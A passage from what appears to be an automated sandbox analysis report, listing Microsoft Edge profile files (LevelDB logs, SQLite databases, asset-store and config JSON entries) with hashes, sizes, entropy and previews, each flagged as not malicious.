                                                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):333
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.119858214452892
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ydPcWM+q2P923oH+Tcwt9Eh1tIFUt8hdPoj1Zmw+hdPmWMVkwO923oH+Tcwt9Ehx:EcL+v4Yeb9Eh16FUt83oJ/+3mLV5LYe8
                                                                                                                                                                                                                                                                                                                                MD5:EC6CA893E956BEF7DB7A12F7C717ABC4
                                                                                                                                                                                                                                                                                                                                SHA1:4221E0C7CD70A680A5A38BA7A9C8CEB619918F59
                                                                                                                                                                                                                                                                                                                                SHA-256:89829BABDC22EA046855E5918C0E2E10B6DF219F49D79EBAF37C4FE1554A9781
                                                                                                                                                                                                                                                                                                                                SHA-512:371DBDADEBB76DC191D1D98DB8DC94A40FBB62D4D6E9DD6A50D1E00F2393B7DF8C418B6F4EF6DE6EFB3DA0121E428DD36D1C23CB506FA467692DA4C6EDA0C52F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:25.403 f1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/10/28-17:02:25.405 f1c Recovering log #3.2024/10/28-17:02:25.409 f1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):333
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.119858214452892
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ydPcWM+q2P923oH+Tcwt9Eh1tIFUt8hdPoj1Zmw+hdPmWMVkwO923oH+Tcwt9Ehx:EcL+v4Yeb9Eh16FUt83oJ/+3mLV5LYe8
                                                                                                                                                                                                                                                                                                                                MD5:EC6CA893E956BEF7DB7A12F7C717ABC4
                                                                                                                                                                                                                                                                                                                                SHA1:4221E0C7CD70A680A5A38BA7A9C8CEB619918F59
                                                                                                                                                                                                                                                                                                                                SHA-256:89829BABDC22EA046855E5918C0E2E10B6DF219F49D79EBAF37C4FE1554A9781
                                                                                                                                                                                                                                                                                                                                SHA-512:371DBDADEBB76DC191D1D98DB8DC94A40FBB62D4D6E9DD6A50D1E00F2393B7DF8C418B6F4EF6DE6EFB3DA0121E428DD36D1C23CB506FA467692DA4C6EDA0C52F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:25.403 f1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/10/28-17:02:25.405 f1c Recovering log #3.2024/10/28-17:02:25.409 f1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4630064999110987
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuOBe:TouQq3qh7z3bY2LNW9WMcUvBuP
                                                                                                                                                                                                                                                                                                                                MD5:34821EA78CF55285799CE4F1C60823FD
                                                                                                                                                                                                                                                                                                                                SHA1:000E91D6551873B5BA722A215CB1EBACEF1BFA6E
                                                                                                                                                                                                                                                                                                                                SHA-256:45EE151C56F5A0099FB43CB8FB154DAF3E47F4C5865CB22162068DE0036854C4
                                                                                                                                                                                                                                                                                                                                SHA-512:6AF7811FBBE11E3503243B194BBA9F474BB77D08A53539690F65B413221290D5FFA3D70E603DFAA571FA33B0E1207F6956D8DD9DBC2FC4FE638140ADF5DF4F75
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.206090826618558
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ytOq2P923oH+TcwtnG2tMsIFUt8hEZmw+hkkwO923oH+TcwtnG2tMsLJ:Rv4Yebn9GFUt8G/+65LYebn95J
                                                                                                                                                                                                                                                                                                                                MD5:1110C5F4854A00EB12AD275599E71C1D
                                                                                                                                                                                                                                                                                                                                SHA1:3DA3A983F422B4FA237B5219BCC22A356311D80D
                                                                                                                                                                                                                                                                                                                                SHA-256:C6D7AC191846E90E3E720729648BF226A8156058836471732913BC7504117864
                                                                                                                                                                                                                                                                                                                                SHA-512:7049846F5C22B24687325FCCCFB5856B705F25EE17AC5552FAC6681E27957A741E024BACF1E42D2F7AB6E40B81F50D7565F328A24A144F7745DECF6A0EFEBA08
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.765 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/10/28-17:02:19.766 1ce0 Recovering log #3.2024/10/28-17:02:19.766 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.206090826618558
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ytOq2P923oH+TcwtnG2tMsIFUt8hEZmw+hkkwO923oH+TcwtnG2tMsLJ:Rv4Yebn9GFUt8G/+65LYebn95J
                                                                                                                                                                                                                                                                                                                                MD5:1110C5F4854A00EB12AD275599E71C1D
                                                                                                                                                                                                                                                                                                                                SHA1:3DA3A983F422B4FA237B5219BCC22A356311D80D
                                                                                                                                                                                                                                                                                                                                SHA-256:C6D7AC191846E90E3E720729648BF226A8156058836471732913BC7504117864
                                                                                                                                                                                                                                                                                                                                SHA-512:7049846F5C22B24687325FCCCFB5856B705F25EE17AC5552FAC6681E27957A741E024BACF1E42D2F7AB6E40B81F50D7565F328A24A144F7745DECF6A0EFEBA08
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.765 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/10/28-17:02:19.766 1ce0 Recovering log #3.2024/10/28-17:02:19.766 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6133471289985054
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWPRbMMAqtRy:TLapR+DDNzWjJ0npnyXKUO8+jGSpA3mL
                                                                                                                                                                                                                                                                                                                                MD5:8C364013FA7DA007C285599C53693740
                                                                                                                                                                                                                                                                                                                                SHA1:243A21148D1B2044AC45E23AAACB68213DF44B7D
                                                                                                                                                                                                                                                                                                                                SHA-256:934DD32FD7403DC68CA22424462A3162A808088D0883E881328AF4D83515143F
                                                                                                                                                                                                                                                                                                                                SHA-512:06790C29A866E58E8A1461E4B75A891C75DE1304E5A72F7E47CD2829B6B47C3D78A95E469A3FC6A5DE122EF803FF5774B51D252687036459D578994EB99F3557
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.354148196810786
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:hA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:hFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                                MD5:21D970D7F3977F9E48B7DA00697B9D61
                                                                                                                                                                                                                                                                                                                                SHA1:0A5580844EB29E51FA5739B059095AAAA4460C01
                                                                                                                                                                                                                                                                                                                                SHA-256:7983E90725B20C95764AEEA86FA7D4903E71F0A6DD54C2DCA5BFCFD7F34E312C
                                                                                                                                                                                                                                                                                                                                SHA-512:D9067B40AF6B783157FE6E71588D6B67BF2B0648396AC57D1A65B4DD17C637A0FE2C480539CB6825084B64B5387A245F2F0184245634B91006F1A5A0C828B7BF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.V..q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13374622947988935..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.155282934689396
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ydUu9AB1923oH+Tcwtk2WwnvB2KLlkdCui+q2P923oH+Tcwtk2WwnvIFUv:IiMYebkxwnvFLfui+v4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                                                MD5:86D1FB05C53A1007BEC5806EAEECD533
                                                                                                                                                                                                                                                                                                                                SHA1:E2BFD58543FA6A9317C822E40503805B1B5CED8C
                                                                                                                                                                                                                                                                                                                                SHA-256:BF3F3D18189B0B66CB4191A5BBD8F23F67BC7088A7531A24055359CD25374CDA
                                                                                                                                                                                                                                                                                                                                SHA-512:DC150356A896342EAB2DF8339F1CEE41232A50916CDB13F98AFBBB1F63C30895C075CE364583F49D1D8F2EE8FD2124431E83C8061D966AB1E27774F05007FC31
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:25.430 50c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/10/28-17:02:25.490 50c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3245969952328505
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RL:C1gAg1zfvT
                                                                                                                                                                                                                                                                                                                                MD5:59357CABDDB2EF5EC8705392D69AB1C3
                                                                                                                                                                                                                                                                                                                                SHA1:9BF24A6FC730EA285C113B4B35F1AF386E121AB2
                                                                                                                                                                                                                                                                                                                                SHA-256:8C09BDE83E3FF9AB0CBA674859796A7ED28B2020486F33083DEB1CE17C67E630
                                                                                                                                                                                                                                                                                                                                SHA-512:9D1EAD4FF9FDB6BBDBE5EB97EFD946C859538027DE2453CDA145139045A40DB4044622F3A9A51837EACC9E802FA1BD933682697724006FDC2A582DCED5B94225
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.134395478922094
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yM9N+q2P923oH+Tcwt8aPrqIFUt8hHZmw+hnVkwO923oH+Tcwt8amLJ:yv4YebL3FUt8N/+/5LYebQJ
                                                                                                                                                                                                                                                                                                                                MD5:4BF531924DDFA94DB7F2E9910651FBBB
                                                                                                                                                                                                                                                                                                                                SHA1:7FF36CA07066634D803AFFAF6292E2CC97B77D67
                                                                                                                                                                                                                                                                                                                                SHA-256:E65F0A3DA23E9E467E251B383203B8D5FD4C5FD5096A103B0228928B346F78EB
                                                                                                                                                                                                                                                                                                                                SHA-512:DF2F666B606C431BD12919471B522174A7A235FE3D1F2891330D45F467491508D436DC319870E0D9B33F1CFB8FE1B09EDA635D914CBFD365C318730F21F1DAA4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.811 1cf8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/10/28-17:02:19.812 1cf8 Recovering log #3.2024/10/28-17:02:19.812 1cf8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.134395478922094
                                                                                                                                                                                                                                                                                                                                Encrypted:false
